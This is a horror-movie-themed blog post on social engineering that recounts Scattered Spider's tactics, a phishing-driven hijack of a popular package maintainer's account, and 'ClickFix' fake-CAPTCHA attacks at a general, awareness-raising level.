While I understand that an adrenaline rush can cloud judgement, why are the supporting characters in horror films so frustratingly dumb? As soon as they get their hands on a weapon, they’ll use it once, and then leave it behind as they run into an area with a single entry/exit. Yes, there must be sacrifices in order to elevate the spookiness of the film, but c’mon.
A more terrifying movie would portray each character (not only the protagonist) as competent, yet despite their sound logic, they still meet their early demise. Someone pitch a screenplay of a slasher in which all of the victims are NASA engineers.
That would instill a true sense of dread. No matter how intelligent or competent you are, you still become a victim of an attack.
In Hollywood, the threats lurking in the dark are fictional monsters wielding cleavers and chainsaws. At the worst, they may cause nightmares. Yet, in the digital woods, real monsters exist and their attacks can result in serious harm.
Of course, these monsters do not possess any supernatural traits or slash their victims into ribbons, but they do hack their victims into pieces. Although now a common trope, their weapon of choice lures victims in with tricks and targets the mind rather than the body: social engineering.
Spiders catching prey on the webs
Although cyber criminals have been using mind tricks to gain unauthorized access to systems since the dawn of digital time, the latest villains making headlines are called Scattered Spider.
The cybergang emerged as a haunting entity, and has been implicated in dozens of high-profile attacks including the 2023 ransomware attacks on several Las Vegas resorts.
The members of Scattered Spider have become notorious for their layered social engineering techniques. In their campaigns, they harvested personal information on employees of their target organizations or trusted third-parties via social media, open-source sleuthing, and leaked databases. With these details in hand, they were able to create convincing costumes of internal members and impersonate them.
Once they had assumed a trusted identity, they engage in elaborate con jobs, frequently over several conversations, to coax employees into disclosing their credentials or running remote access tools to give them initial access into systems.
Scattered Spider was also known to carry out SIM swap attacks, in which an attacker is able to trick a mobile carrier into transferring a victim’s phone number to a device under their control. Once the transfer is completed, the attacker is then able to obtain access codes and reset passwords to hijack any accounts that use the phone number as a means of identification.
Even if they were unsuccessful in those attacks, the Spiders were also observed to carry out MFA fatigue attacks, a digital torture tactic where victims are bombarded with MFA prompts until they accept.
Only recently have a handful of members been identified and arrested. Overall, Scattered Spider has been attributed to at least 120 attacks worldwide that have resulted in over $115 million in damages.
Just last month, digital villains targeted Josh Junon (qix), an experienced developer and the maintainer of some very popular packages that are collectively downloaded over 2.5 billion times every week.
Junon was tricked into clicking on a link within an email. A highly convincing email, disguised as a security policy update notification.
The link navigated Junon to a spoofed, attacker-controlled authentication page. Once he submitted his repository credentials, the villains gained access to his account and began to publish new versions of packages with malware inside.
The malicious code injected itself into browsers in order to monitor for cryptocurrency transactions and silently swap the receiving address with the address to one of the attackers’ wallets. Thankfully, this mass haunting was quickly discovered and resolved before any major damage was done. In the end, the villains only stole ~$450 in Ethereum and ~$50 in Solana.
This is a rare happy ending, as similar package hijacking attacks have not been detected as quickly.
In this event, good triumphed over evil as the community rallied together to defeat the antagonists. However, it serves as a stark reminder that digital curses are real.
In early March 2024, the security community began to notice a new technique being used by online villains. Coined as “ClickFix” attacks, these ambushes use deceptive CAPTCHA pages that present the user with a series of steps they must take to prove they are not a bot or to fix a nonexistent error.
At the initial stage of the attack, an innocent looking button is displayed. However, once it is clicked, a payload is copied to the victim’s clipboard.
Then, the victim is instructed to paste the payload into their terminal and execute it.
By tricking victims into executing terminal commands, attackers are able to download malware to the system.
In the first reported ClickFix campaign, a threat actor targeted thousands of organizations across the world and developed their CAPTCHA prompts to look as if they were from Google Chrome, Microsoft Word, and OneDrive.
In August of this year, the Ukrainian CERT published the details of their investigation into emails that were sent to government officials titled “Spreadsheet Replacement” that contained a link that mimicked a Google spreadsheet. Once clicked, the link opened a window that utilized the ClickFix attack technique.
The haunting truth about cybersecurity is that a single human error can unravel even the strongest technological defenses.
The human mind continues to be the greatest threat to security.